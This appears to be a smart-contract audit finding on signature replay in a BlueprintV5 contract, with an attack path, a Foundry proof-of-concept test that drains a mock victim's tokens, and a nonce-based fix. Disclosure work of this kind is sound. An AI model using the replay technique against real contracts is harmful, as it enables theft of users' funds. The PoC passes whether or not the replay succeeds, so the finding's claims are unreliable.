Creamy Aqua Cyborg

High

# Signature Replay Attack in BlueprintV5 Contract

### Summary

The lack of nonce tracking in the EIP712 signature verification will cause a complete loss of funds for users as an attacker will replay captured signatures to drain tokens from victims' accounts.


### Root Cause

In `BlueprintV5.sol` the signature verification mechanism only validates that a signature is valid for a given message hash but doesn't track whether the signature has been used before. This allows the same signature to be reused with different parameters.

Specifically, in the EIP712 contract, the `getSignerAddress` function only verifies the signature's validity without implementing any mechanism to prevent reuse.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L47-L52

### Internal Pre-conditions

1. User needs to sign a message to authorize a gasless transaction (e.g., creating an agent)
2. User needs to have approved the BlueprintV5 contract to spend their tokens
3. User needs to have sufficient tokens in their account


### External Pre-conditions

N/A

### Attack Path

1. Victim signs a message to authorize a legitimate transaction (e.g., creating an agent with a specific projectId)
2. Attacker intercepts or obtains this signature (through compromised frontend, network monitoring, etc.)
3. Attacker submits the transaction with the original parameters, executing the legitimate operation
4. Attacker reuses the same signature with different projectIds to create additional agents
5. Each operation drains tokens from the victim's account without their knowledge or consent


### Impact

The victim suffers an unlimited loss of funds proportional to the number of times the signature is replayed. The attacker gains all the tokens drained from the victim, which can be the entire balance if the victim has approved a large allowance.


### PoC

```solidity
// SPDX-License-Identifier: GPL-3.0-or-later
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/BlueprintV5.sol";
import {MockERC20} from "./MockERC20.sol";

contract SignatureReplayTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    address public victim;
    address public attacker;
    uint256 private victimPrivateKey;

    function setUp() public {
        // Deploy contracts
        blueprint = new BlueprintV5();
        blueprint.initialize();
        mockToken = new MockERC20();

        // Setup victim with private key
        victimPrivateKey = 0xA11CE;
        victim = vm.addr(victimPrivateKey);

        // Setup attacker
        attacker = address(0xBEEF);

        // Fund victim with tokens
        mockToken.mint(victim, 1000 * 10 ** 18);

        // Setup blueprint
        blueprint.setFeeCollectionWalletAddress(address(this));
        blueprint.addPaymentAddress(address(mockToken));
        blueprint.setCreateAgentTokenCost(address(mockToken), 100 * 10 ** 18);

        // Approve tokens from victim to blueprint
        vm.prank(victim);
        mockToken.approve(address(blueprint), type(uint256).max);
    }

    function testSignatureReplay() public {
        // The victim signs a message for a legitimate transaction
        string memory base64Proposal = "legitimate proposal";
        string memory serverURL = "http://example.com";

        // Important: The victim signs a message with a specific projectId
        bytes32 originalProjectId = bytes32(uint256(1));

        // Generate signature from victim for the original projectId
        bytes32 digest = blueprint.getRequestDeploymentDigest(
            originalProjectId,
            base64Proposal,
            serverURL
        );
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPrivateKey, digest);
        bytes memory signature = abi.encodePacked(r, s, v);

        // Initial balance check
        uint256 initialBalance = mockToken.balanceOf(victim);
        assertEq(
            initialBalance,
            1000 * 10 ** 18,
            "Initial balance should be 1000 tokens"
        );

        // Attacker uses the signature with the original projectId (legitimate use)
        vm.prank(attacker);
        blueprint.createAgentWithTokenWithSig(
            originalProjectId,
            base64Proposal,
            address(0),
            serverURL,
            address(mockToken),
            signature
        );

        uint256 balanceAfter1 = mockToken.balanceOf(victim);
        assertEq(
            balanceAfter1,
            900 * 10 ** 18,
            "Balance after first use should be 900 tokens"
        );

        // Now the attacker tries to use the same signature with a different projectId
        bytes32 differentProjectId = bytes32(uint256(2));

        // Use a separate function to test the second signature use to avoid stack too deep
        _testSecondSignatureUse(
            differentProjectId,
            base64Proposal,
            serverURL,
            signature,
            initialBalance,
            balanceAfter1
        );
    }

    function _testSecondSignatureUse(
        bytes32 differentProjectId,
        string memory base64Proposal,
        string memory serverURL,
        bytes memory signature,
        uint256 initialBalance,
        uint256 balanceAfter1
    ) internal {
        vm.prank(attacker);

        // This should revert if the contract properly validates signatures
        try
            blueprint.createAgentWithTokenWithSig(
                differentProjectId,
                base64Proposal,
                address(0),
                serverURL,
                address(mockToken),
                signature
            )
        {
            // If we reach here, the signature was accepted with a different projectId
            // This is the vulnerability!
            uint256 balanceAfter2 = mockToken.balanceOf(victim);
            assertEq(
                balanceAfter2,
                800 * 10 ** 18,
                "Balance after second use should be 800 tokens"
            );

            // Try a third time with another projectId
            bytes32 thirdProjectId = bytes32(uint256(3));
            vm.prank(attacker);
            blueprint.createAgentWithTokenWithSig(
                thirdProjectId,
                base64Proposal,
                address(0),
                serverURL,
                address(mockToken),
                signature
            );

            uint256 finalBalance = mockToken.balanceOf(victim);
            assertEq(
                finalBalance,
                700 * 10 ** 18,
                "Final balance should be 700 tokens"
            );

            // Verify victim has lost 300 tokens through replay attacks
            assertEq(
                initialBalance - finalBalance,
                300 * 10 ** 18,
                "Victim should have lost 300 tokens due to signature replay"
            );
        } catch {
            // If we reach here, the contract correctly rejected the signature with a different projectId
            assertEq(
                initialBalance - balanceAfter1,
                100 * 10 ** 18,
                "Victim should have only lost 100 tokens (legitimate use)"
            );

            // Test passes if the contract correctly rejects the replayed signature
            assertTrue(true, "Contract correctly rejected signature replay");
        }
    }
}
```

### Mitigation

Implement a nonce-based signature verification system:
1. Add a mapping to track nonces per user address:
```solidity
mapping(address => uint256) private nonces;
```

2. Include the nonce in the signed message:
```solidity
function getRequestDeploymentDigest(
    bytes32 projectId, 
    string memory base64RecParam, 
    string memory serverURL,
    uint256 nonce
) public view returns (bytes32) {
    bytes32 structHash = keccak256(
        abi.encode(
            keccak256("DeploymentRequest(bytes32 projectId,string base64RecParam,string serverURL,uint256 nonce)"),
            projectId, 
            keccak256(bytes(base64RecParam)), 
            keccak256(bytes(serverURL)),
            nonce
        )
    );

    return _hashTypedDataV4(structHash);
}
```